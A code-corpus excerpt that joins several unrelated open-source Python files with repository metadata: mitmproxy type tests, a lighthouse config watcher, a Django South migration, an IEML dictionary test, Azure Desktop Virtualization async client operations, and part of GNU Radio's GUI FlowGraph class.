        assert seq_type.parse(commands, typing.Sequence[str], "foo,bar") == ["foo", "bar"]
        # Only homogeneous lists of strings are valid values.
        assert seq_type.is_valid(commands, typing.Sequence[str], ["foo"]) is True
        assert seq_type.is_valid(commands, typing.Sequence[str], ["a", "b", 3]) is False
        assert seq_type.is_valid(commands, typing.Sequence[str], 1) is False
        assert seq_type.is_valid(commands, typing.Sequence[str], "foo") is False
class DummyConsole:
    """Minimal addon exposing the commands the flow/data/choice tests rely on."""

    @command.command("view.flows.resolve")
    def resolve(self, spec: str) -> typing.Sequence[flow.Flow]:
        """Return `int(spec)` dummy flows; the literal "err" raises CommandError."""
        if spec == "err":
            raise mitmproxy.exceptions.CommandError()
        return [tflow.tflow(resp=True)] * int(spec)

    @command.command("cut")
    def cut(self, spec: str) -> mitmproxy.types.Data:
        """Return a fixed single-cell data table."""
        return [["test"]]

    @command.command("options")
    def options(self) -> typing.Sequence[str]:
        """Return a fixed list of choice values."""
        return ["one", "two", "three"]
def test_flow():
    """_FlowType: parsing must resolve to exactly one flow."""
    with taddons.context() as tctx:
        tctx.master.addons.add(DummyConsole())
        flow_type = mitmproxy.types._FlowType()
        commands = tctx.master.commands

        assert len(flow_type.completion(commands, flow.Flow, "")) == len(flow_type.valid_prefixes)
        assert flow_type.parse(commands, flow.Flow, "1")
        assert flow_type.is_valid(commands, flow.Flow, tflow.tflow()) is True
        assert flow_type.is_valid(commands, flow.Flow, "xx") is False

        # Zero flows, multiple flows, and a failing resolve all raise.
        for bad_spec in ("0", "2", "err"):
            with pytest.raises(mitmproxy.exceptions.TypeError):
                flow_type.parse(commands, flow.Flow, bad_spec)
def test_flows():
    """_FlowsType: parsing resolves to any number of flows."""
    with taddons.context() as tctx:
        tctx.master.addons.add(DummyConsole())
        flows_type = mitmproxy.types._FlowsType()
        commands = tctx.master.commands

        completions = flows_type.completion(commands, typing.Sequence[flow.Flow], "")
        assert len(completions) == len(flows_type.valid_prefixes)
        assert flows_type.is_valid(commands, typing.Sequence[flow.Flow], [tflow.tflow()]) is True
        assert flows_type.is_valid(commands, typing.Sequence[flow.Flow], "xx") is False
        assert flows_type.is_valid(commands, typing.Sequence[flow.Flow], 0) is False

        # The number of resolved flows mirrors the numeric spec.
        for expected in (0, 1, 2):
            parsed = flows_type.parse(commands, typing.Sequence[flow.Flow], str(expected))
            assert len(parsed) == expected

        with pytest.raises(mitmproxy.exceptions.TypeError):
            flows_type.parse(commands, typing.Sequence[flow.Flow], "err")
def test_data():
    """_DataType: validity rules, and that parse/completion are unsupported."""
    with taddons.context() as tctx:
        b = mitmproxy.types._DataType()
        # Valid data is a list of rows whose cells are str or bytes.
        assert b.is_valid(tctx.master.commands, mitmproxy.types.Data, 0) is False
        assert b.is_valid(tctx.master.commands, mitmproxy.types.Data, []) is True
        assert b.is_valid(tctx.master.commands, mitmproxy.types.Data, [["x"]]) is True
        assert b.is_valid(tctx.master.commands, mitmproxy.types.Data, [[b"x"]]) is True
        assert b.is_valid(tctx.master.commands, mitmproxy.types.Data, [[1]]) is False
        # Data cannot be parsed from a string...
        with pytest.raises(mitmproxy.exceptions.TypeError):
            b.parse(tctx.master.commands, mitmproxy.types.Data, "foo")
        # ...nor completed. (BUG FIX: the second raises-block previously
        # duplicated the parse() call verbatim and exercised nothing new.)
        with pytest.raises(mitmproxy.exceptions.TypeError):
            b.completion(tctx.master.commands, mitmproxy.types.Data, "foo")
def test_choice():
    """_ChoiceType: values are validated against the named options command."""
    with taddons.context() as tctx:
        tctx.master.addons.add(DummyConsole())
        choice_type = mitmproxy.types._ChoiceType()
        commands = tctx.master.commands

        assert choice_type.is_valid(
            commands,
            mitmproxy.types.Choice("options"),
            "one",
        ) is True
        assert choice_type.is_valid(
            commands,
            mitmproxy.types.Choice("options"),
            "invalid",
        ) is False
        # An unknown options command makes every value invalid.
        assert choice_type.is_valid(
            commands,
            mitmproxy.types.Choice("nonexistent"),
            "invalid",
        ) is False

        comp = choice_type.completion(commands, mitmproxy.types.Choice("options"), "")
        assert comp == ["one", "two", "three"]
        assert choice_type.parse(commands, mitmproxy.types.Choice("options"), "one") == "one"
        with pytest.raises(mitmproxy.exceptions.TypeError):
            choice_type.parse(commands, mitmproxy.types.Choice("options"), "invalid")
def test_typemanager():
    # CommandTypes.get resolves both plain Python types and parameterised
    # Choice instances.
    assert mitmproxy.types.CommandTypes.get(bool, None)
    # NOTE(review): "choide" looks like a typo for "choice", but the string is
    # irrelevant here — only the Choice *type* lookup is exercised, so the
    # literal is deliberately left untouched.
    assert mitmproxy.types.CommandTypes.get(mitmproxy.types.Choice("choide"), None)
|
vhaupert/mitmproxy
|
test/mitmproxy/test_types.py
|
Python
|
mit
| 10,575
|
import logging
import threading
from concurrent import futures
from .monitor import ConfigFileMonitor
from lighthouse.events import wait_on_event
MAX_WORKERS = 8
logger = logging.getLogger(__name__)
class ConfigWatcher(object):
    """
    Base class for watchers that monitor and maintain `Configurable` instances.

    Subclasses define which `Configurable` subclasses they watch via the
    `watched_configurables` attribute as well as implement the `run()` and
    `wind_down()` methods.

    Optionally, subclasses can also define "on_<configurable>_<action>" methods
    (e.g. "on_service_update") that will hook into the add/update/remove
    configurable callbacks.

    .. warning::
        Care must be taken that these hooks are idempotent with regards
        to the Watcher subclass instance. Configuration changes are liable to
        happen at any time and in any order.
    """

    # the list or tuple of Configurable subclasses to watch
    watched_configurables = ()

    def __init__(self, config_dir):
        self.config_dir = config_dir
        self.observers = []

        # One "registry" dict per watched class, keyed by configurable name.
        self.configurables = {}
        for config_class in self.watched_configurables:
            self.configurables[config_class] = {}

        self.work_pool = futures.ThreadPoolExecutor(max_workers=MAX_WORKERS)
        self.thread_pool = {}

        self.shutdown = threading.Event()

    def start(self):
        """
        Iterates over the `watched_configurables` attribute and starts a
        config file monitor for each. The resulting observer threads are
        kept in an `observers` list attribute.

        Blocks until `stop()` sets the shutdown event.
        """
        for config_class in self.watched_configurables:
            monitor = ConfigFileMonitor(config_class, self.config_dir)
            self.observers.append(
                monitor.start(
                    self.add_configurable,
                    self.update_configurable,
                    self.remove_configurable
                )
            )

        wait_on_event(self.shutdown)

    def wind_down(self):
        """
        This method is called in the `stop()` method once the config file
        observers are stopped but before any threads are joined.

        Subclasses are expected to implement this.
        """
        raise NotImplementedError

    def launch_thread(self, name, fn, *args, **kwargs):
        """
        Adds a named thread to the "thread pool" dictionary of Thread objects.

        A daemon thread that executes the passed-in function `fn` with the
        given args and keyword args is started and tracked in the `thread_pool`
        attribute with the given `name` as the key.
        """
        logger.debug(
            "Launching thread '%s': %s(%s, %s)", name,
            fn, args, kwargs
        )
        self.thread_pool[name] = threading.Thread(
            target=fn, args=args, kwargs=kwargs
        )
        self.thread_pool[name].daemon = True
        self.thread_pool[name].start()

    def kill_thread(self, name):
        """
        Joins the thread in the `thread_pool` dict with the given `name` key.

        A no-op if no thread is tracked under that name.
        """
        if name not in self.thread_pool:
            return

        self.thread_pool[name].join()
        del self.thread_pool[name]

    def add_configurable(self, configurable_class, name, configurable):
        """
        Callback fired when a configurable instance is added.

        Adds the configurable to the proper "registry" and calls a method
        named "on_<configurable classname>_add" in the work pool if the hook
        is defined.

        If the added configurable is already present, a warning is logged and
        the entry is overwritten.
        """
        configurable_class_name = configurable_class.__name__.lower()
        logger.info("Adding %s: '%s'", configurable_class_name, name)

        registry = self.registry_for(configurable_class)
        if name in registry:
            # logger.warn() is a deprecated alias; use warning().
            logger.warning(
                "Adding already-existing %s: '%s'",
                configurable_class_name, name
            )

        registry[name] = configurable

        hook = self.hook_for(configurable_class, action="add")
        if not hook:
            return

        def done(f):
            # Surface hook failures, which would otherwise vanish in the pool.
            try:
                f.result()
            except Exception:
                logger.exception("Error adding configurable '%s'", name)

        self.work_pool.submit(hook, configurable).add_done_callback(done)

    def update_configurable(self, configurable_class, name, config):
        """
        Callback fired when a configurable instance is updated.

        Looks up the existing configurable in the proper "registry" and
        `apply_config()` is called on it.

        If a method named "on_<configurable classname>_update" is defined it
        is called in the work pool and passed the configurable's name and the
        new config.

        If the updated configurable is not present, `add_configurable()` is
        called instead.
        """
        configurable_class_name = configurable_class.__name__.lower()
        logger.info(
            "updating %s: '%s'", configurable_class_name, name
        )

        registry = self.registry_for(configurable_class)
        if name not in registry:
            logger.warning(
                "Tried to update unknown %s: '%s'",
                configurable_class_name, name
            )
            # BUG FIX: the `name` argument was previously omitted, so this
            # call raised TypeError (add_configurable takes class, name,
            # configurable).
            self.add_configurable(
                configurable_class,
                name,
                configurable_class.from_config(name, config)
            )
            return

        registry[name].apply_config(config)

        hook = self.hook_for(configurable_class, "update")
        if not hook:
            return

        def done(f):
            try:
                f.result()
            except Exception:
                logger.exception("Error updating configurable '%s'", name)

        self.work_pool.submit(hook, name, config).add_done_callback(done)

    def remove_configurable(self, configurable_class, name):
        """
        Callback fired when a configurable instance is removed.

        Looks up the existing configurable in the proper "registry" and
        removes it.

        If a method named "on_<configurable classname>_remove" is defined it
        is called via the work pool and passed the configurable's name.

        If the removed configurable is not present, a warning is given and no
        further action is taken.
        """
        configurable_class_name = configurable_class.__name__.lower()
        logger.info("Removing %s: '%s'", configurable_class_name, name)

        registry = self.registry_for(configurable_class)
        if name not in registry:
            logger.warning(
                "Tried to remove unknown active %s: '%s'",
                configurable_class_name, name
            )
            return

        hook = self.hook_for(configurable_class, action="remove")
        if not hook:
            registry.pop(name)
            return

        def done(f):
            # Only drop the registry entry once the hook ran successfully.
            try:
                f.result()
                registry.pop(name)
            except Exception:
                logger.exception("Error removing configurable '%s'", name)

        self.work_pool.submit(hook, name).add_done_callback(done)

    def registry_for(self, configurable_class):
        """
        Helper method for retrieving the "registry" dictionary of a given
        Configurable subclass.

        For example, the registry of Cluster instances for a config watcher
        would be `self.configurables[Cluster]`.
        """
        return self.configurables[configurable_class]

    def hook_for(self, configurable_class, action):
        """
        Helper method for determining if an on_<configurable class>_<action>
        method is present, to be used as a hook in the add/update/remove
        configurable methods.

        Returns None if no such hook is defined.
        """
        configurable_class_name = configurable_class.__name__.lower()

        return getattr(
            self,
            "on_" + configurable_class_name + "_" + action,
            None
        )

    def stop(self):
        """
        Method for shutting down the watcher.

        All config file observers are stopped and their threads joined, along
        with the worker thread pool.
        """
        self.shutdown.set()
        for monitor in self.observers:
            monitor.stop()

        self.wind_down()

        for monitor in self.observers:
            monitor.join()
        for thread in self.thread_pool.values():
            thread.join()

        self.work_pool.shutdown()
|
wglass/lighthouse
|
lighthouse/configs/watcher.py
|
Python
|
apache-2.0
| 8,582
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Initial schema migration: creates the ``BudgetLine`` model.

    NOTE(review): historical South migration — South compares the frozen
    ``models`` structure below, so the code must stay as-is; only
    documentation has been added.
    """

    def forwards(self, orm):
        # Adding model 'BudgetLine'
        db.create_table('budget_lines_budgetline', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('title', self.gf('django.db.models.fields.CharField')(db_index=True,max_length=256)),
            ('budget_id', self.gf('django.db.models.fields.CharField')(max_length=64, db_index=True)),
            ('amount_allocated', self.gf('django.db.models.fields.PositiveIntegerField')()),
            ('amount_used', self.gf('django.db.models.fields.PositiveIntegerField')()),
            ('year', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
            # self-referential FK: a line may roll up into a containing line
            ('containing_line', self.gf('django.db.models.fields.related.ForeignKey')(related_name='sublines', null=True, to=orm['budget_lines.BudgetLine'])),
        ))
        db.send_create_signal('budget_lines', ['BudgetLine'])

    def backwards(self, orm):
        # Deleting model 'BudgetLine'
        db.delete_table('budget_lines_budgetline')

    # South's frozen model definitions (do not edit by hand).
    models = {
        'budget_lines.budgetline': {
            'Meta': {'object_name': 'BudgetLine'},
            'amount_allocated': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'amount_used': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'budget_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_index': 'True'}),
            'containing_line': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sublines'", 'null': 'True', 'to': "orm['budget_lines.BudgetLine']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'db_index': 'True','max_length':'256'}),
            'year': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        }
    }

    complete_apps = ['budget_lines']
|
daonb/obudget
|
src/server/budget_lines/migrations/0001_initial.py
|
Python
|
bsd-3-clause
| 2,111
|
import unittest
from ieml.dictionary.dictionary import Dictionary
import numpy as np
from ieml.dictionary.script import Script
from ieml.ieml_database import IEMLDatabase, GitInterface
class DictionaryTestCase(unittest.TestCase):
    """Sanity checks on the dictionary's script table."""

    @classmethod
    def setUpClass(cls) -> None:
        # Load the dictionary once for the whole test case.
        cls.d = IEMLDatabase(folder=GitInterface().folder).get_dictionary()

    def test_scripts(self):
        """scripts is a 1-D ndarray of Script objects, one per dictionary entry."""
        scripts = self.d.scripts
        self.assertIsInstance(scripts, np.ndarray)
        self.assertEqual(scripts.ndim, 1)
        self.assertEqual(scripts.shape, (len(self.d),))
        for script in scripts:
            self.assertIsInstance(script, Script)
|
IEMLdev/propositions-restful-server
|
ieml/test/dictionary/test_dictionary.py
|
Python
|
gpl-3.0
| 1,134
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
# NOTE(review): auto-generated by AutoRest — regeneration overwrites edits,
# so only documentation has been added here.
class DesktopsOperations:
    """DesktopsOperations async operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~desktop_virtualization_api_client.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer) -> None:
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    async def get(
        self,
        resource_group_name: str,
        application_group_name: str,
        desktop_name: str,
        **kwargs: Any
    ) -> "_models.Desktop":
        """Get a desktop.

        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param application_group_name: The name of the application group.
        :type application_group_name: str
        :param desktop_name: The name of the desktop within the specified desktop group.
        :type desktop_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: Desktop, or the result of cls(response)
        :rtype: ~desktop_virtualization_api_client.models.Desktop
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.Desktop"]
        # Map well-known HTTP errors onto typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-09-03-preview"
        accept = "application/json"

        # Construct URL
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
            'applicationGroupName': self._serialize.url("application_group_name", application_group_name, 'str', max_length=64, min_length=3),
            'desktopName': self._serialize.url("desktop_name", desktop_name, 'str', max_length=24, min_length=3),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('Desktop', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/desktops/{desktopName}'}  # type: ignore

    async def update(
        self,
        resource_group_name: str,
        application_group_name: str,
        desktop_name: str,
        desktop: Optional["_models.DesktopPatch"] = None,
        **kwargs: Any
    ) -> "_models.Desktop":
        """Update a desktop.

        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param application_group_name: The name of the application group.
        :type application_group_name: str
        :param desktop_name: The name of the desktop within the specified desktop group.
        :type desktop_name: str
        :param desktop: Object containing Desktop definitions.
        :type desktop: ~desktop_virtualization_api_client.models.DesktopPatch
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: Desktop, or the result of cls(response)
        :rtype: ~desktop_virtualization_api_client.models.Desktop
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.Desktop"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-09-03-preview"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.update.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
            'applicationGroupName': self._serialize.url("application_group_name", application_group_name, 'str', max_length=64, min_length=3),
            'desktopName': self._serialize.url("desktop_name", desktop_name, 'str', max_length=24, min_length=3),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # The PATCH body is optional; omit it entirely when no patch is given.
        body_content_kwargs = {}  # type: Dict[str, Any]
        if desktop is not None:
            body_content = self._serialize.body(desktop, 'DesktopPatch')
        else:
            body_content = None
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('Desktop', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/desktops/{desktopName}'}  # type: ignore

    def list(
        self,
        resource_group_name: str,
        application_group_name: str,
        **kwargs: Any
    ) -> AsyncIterable["_models.DesktopList"]:
        """List desktops.

        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param application_group_name: The name of the application group.
        :type application_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either DesktopList or the result of cls(response)
        :rtype: ~azure.core.async_paging.AsyncItemPaged[~desktop_virtualization_api_client.models.DesktopList]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.DesktopList"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-09-03-preview"
        accept = "application/json"

        def prepare_request(next_link=None):
            # First page hits the templated URL; later pages follow next_link.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list.metadata['url']  # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
                    'applicationGroupName': self._serialize.url("application_group_name", application_group_name, 'str', max_length=64, min_length=3),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        async def extract_data(pipeline_response):
            deserialized = self._deserialize('DesktopList', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/desktops'}  # type: ignore
|
Azure/azure-sdk-for-python
|
sdk/desktopvirtualization/azure-mgmt-desktopvirtualization/azure/mgmt/desktopvirtualization/aio/operations/_desktops_operations.py
|
Python
|
mit
| 12,575
|
"""
Copyright 2007-2011, 2016q Free Software Foundation, Inc.
This file is part of GNU Radio
SPDX-License-Identifier: GPL-2.0-or-later
"""
import ast
import functools
import random
from distutils.spawn import find_executable
from itertools import count
from gi.repository import GLib, Gtk
from . import colors
from .drawable import Drawable
from .connection import DummyConnection
from .. import Actions, Constants, Utils, Bars, Dialogs, MainWindow
from ..external_editor import ExternalEditor
from ...core import Messages
from ...core.FlowGraph import FlowGraph as CoreFlowgraph
class _ContextMenu(object):
    """
    Help with drawing the right click context menu
    """
    def __init__(self, main_window):
        self._menu = Gtk.Menu.new_from_model(Bars.ContextMenu())
        self._menu.attach_to_widget(main_window)

        # In GTK 3.22 Menu.popup was deprecated, we want to popup at the
        # pointer, so use that new function instead if we can.
        # check_version returns None when the running GTK is at least 3.22;
        # the instance attribute then shadows the class-level popup() below.
        if Gtk.check_version(3, 22, 0) is None:
            self.popup = self._menu.popup_at_pointer

    def popup(self, event):
        # Fallback for GTK < 3.22 (only reached when the instance attribute
        # above was not assigned).
        self._menu.popup(None, None, None, None, event.button, event.time)
class FlowGraph(CoreFlowgraph, Drawable):
"""
FlowGraph is the data structure to store graphical signal blocks,
graphical inputs and outputs,
and the connections between inputs and outputs.
"""
def __init__(self, parent, **kwargs):
"""
FlowGraph constructor.
Create a list for signal blocks and connections. Connect mouse handlers.
"""
super(self.__class__, self).__init__(parent, **kwargs)
Drawable.__init__(self)
# We need to get the main window object so the context menu can be to the
# registered actions
app = Gtk.Application.get_default()
main_window = None
for window in app.get_windows():
if isinstance(window, MainWindow.MainWindow):
main_window = window
break
self.drawing_area = None
# important vars dealing with mouse event tracking
self.element_moved = False
self.mouse_pressed = False
self.press_coor = (0, 0)
# selected
self.selected_elements = set()
self._old_selected_port = None
self._new_selected_port = None
# current mouse hover element
self.element_under_mouse = None
# context menu
self._context_menu = _ContextMenu(main_window)
self.get_context_menu = lambda: self._context_menu
self._new_connection = None
self._elements_to_draw = []
self._external_updaters = {}
def _get_unique_id(self, base_id=''):
"""
Get a unique id starting with the base id.
Args:
base_id: the id starts with this and appends a count
Returns:
a unique id
"""
block_ids = set(b.name for b in self.blocks)
for index in count():
block_id = '{}_{}'.format(base_id, index)
if block_id not in block_ids:
break
return block_id
def install_external_editor(self, param, parent=None):
target = (param.parent_block.name, param.key)
if target in self._external_updaters:
editor = self._external_updaters[target]
else:
config = self.parent_platform.config
editor = (find_executable(config.editor) or
Dialogs.choose_editor(parent, config)) # todo: pass in parent
if not editor:
return
updater = functools.partial(
self.handle_external_editor_change, target=target)
editor = self._external_updaters[target] = ExternalEditor(
editor=editor,
name=target[0], value=param.get_value(),
callback=functools.partial(GLib.idle_add, updater)
)
editor.start()
try:
editor.open_editor()
except Exception as e:
# Problem launching the editor. Need to select a new editor.
Messages.send('>>> Error opening an external editor. Please select a different editor.\n')
# Reset the editor to force the user to select a new one.
self.parent_platform.config.editor = ''
def handle_external_editor_change(self, new_value, target):
try:
block_id, param_key = target
self.get_block(block_id).params[param_key].set_value(new_value)
except (IndexError, ValueError): # block no longer exists
self._external_updaters[target].stop()
del self._external_updaters[target]
return
Actions.EXTERNAL_UPDATE()
def add_new_block(self, key, coor=None):
"""
Add a block of the given key to this flow graph.
Args:
key: the block key
coor: an optional coordinate or None for random
"""
id = self._get_unique_id(key)
scroll_pane = self.drawing_area.get_parent().get_parent()
# calculate the position coordinate
h_adj = scroll_pane.get_hadjustment()
v_adj = scroll_pane.get_vadjustment()
if coor is None: coor = (
int(random.uniform(.25, .75)*h_adj.get_page_size() + h_adj.get_value()),
int(random.uniform(.25, .75)*v_adj.get_page_size() + v_adj.get_value()),
)
# get the new block
block = self.new_block(key)
block.coordinate = coor
block.params['id'].set_value(id)
Actions.ELEMENT_CREATE()
return id
def make_connection(self):
"""this selection and the last were ports, try to connect them"""
if self._new_connection and self._new_connection.has_real_sink:
self._old_selected_port = self._new_connection.source_port
self._new_selected_port = self._new_connection.sink_port
if self._old_selected_port and self._new_selected_port:
try:
self.connect(self._old_selected_port, self._new_selected_port)
Actions.ELEMENT_CREATE()
except Exception as e:
Messages.send_fail_connection(e)
self._old_selected_port = None
self._new_selected_port = None
return True
return False
    def update(self):
        """
        Call the top level rewrite and validate.
        Call the top level create labels and shapes.
        """
        # NOTE: order matters — labels and shapes are rebuilt from the
        # rewritten/validated graph and the refreshed draw list.
        self.rewrite()
        self.validate()
        self.update_elements_to_draw()
        self.create_labels()
        self.create_shapes()
def reload(self):
"""
Reload flow-graph (with updated blocks)
Args:
page: the page to reload (None means current)
Returns:
False if some error occurred during import
"""
success = False
data = self.export_data()
if data:
self.unselect()
success = self.import_data(data)
self.update()
return success
###########################################################################
# Copy Paste
###########################################################################
def copy_to_clipboard(self):
    """
    Copy the selected blocks and connections into the clipboard.

    Returns:
        ((x_min, y_min), blocks_data, connections_data) or None
        when no block is selected
    """
    selection = list(self.selected_blocks())
    if not selection:
        return None
    # top-left corner of the selection's bounding box
    x_min = min(blk.coordinate[0] for blk in selection)
    y_min = min(blk.coordinate[1] for blk in selection)
    # keep only connections whose endpoints are both selected
    internal = [c for c in self.connections
                if c.source_block in selection and c.sink_block in selection]
    return (
        (x_min, y_min),
        [blk.export_data() for blk in selection],
        [conn.export_data() for conn in internal],
    )
def paste_from_clipboard(self, clipboard):
    """
    Paste the blocks and connections from the clipboard.

    Args:
        clipboard: ((x_min, y_min), blocks_n, connections_n) as produced
            by copy_to_clipboard()
    """
    (x_min, y_min), blocks_n, connections_n = clipboard
    # recalc the position: offset pasted blocks into the visible
    # quarter of the scrolled view, relative to the copied bounding box
    scroll_pane = self.drawing_area.get_parent().get_parent()
    h_adj = scroll_pane.get_hadjustment()
    v_adj = scroll_pane.get_vadjustment()
    x_off = h_adj.get_value() - x_min + h_adj.get_page_size() / 4
    y_off = v_adj.get_value() - y_min + v_adj.get_page_size() / 4
    # an (almost) empty flow graph keeps the original coordinates
    if len(self.get_elements()) <= 1:
        x_off, y_off = 0, 0
    # create blocks
    pasted_blocks = {}
    for block_n in blocks_n:
        block_key = block_n.get('id')
        if block_key == 'options':
            continue  # never paste the special options block
        block_name = block_n.get('name')
        # Verify whether a block with this name exists before adding it;
        # rename a copy of the data so the original clipboard stays intact
        if block_name in (blk.name for blk in self.blocks):
            block_n = block_n.copy()
            block_n['name'] = self._get_unique_id(block_name)
        block = self.new_block(block_key)
        if not block:
            continue  # unknown block was pasted (e.g. dummy block)
        block.import_data(**block_n)
        pasted_blocks[block_name] = block  # that is before any rename
        block.move((x_off, y_off))
        # nudge diagonally until the block no longer sits exactly on
        # top of another block (grid-aligned comparison)
        while any(Utils.align_to_grid(block.coordinate) == Utils.align_to_grid(other.coordinate)
                  for other in self.blocks if other is not block):
            block.move((Constants.CANVAS_GRID_SIZE, Constants.CANVAS_GRID_SIZE))
            # shift all following blocks by the same amount
            x_off += Constants.CANVAS_GRID_SIZE
            y_off += Constants.CANVAS_GRID_SIZE
    self.selected_elements = set(pasted_blocks.values())
    # update before creating connections (ports must exist and be valid)
    self.update()
    # create connections; keys are the ORIGINAL (pre-rename) block names
    for src_block, src_port, dst_block, dst_port in connections_n:
        source = pasted_blocks[src_block].get_source(src_port)
        sink = pasted_blocks[dst_block].get_sink(dst_port)
        connection = self.connect(source, sink)
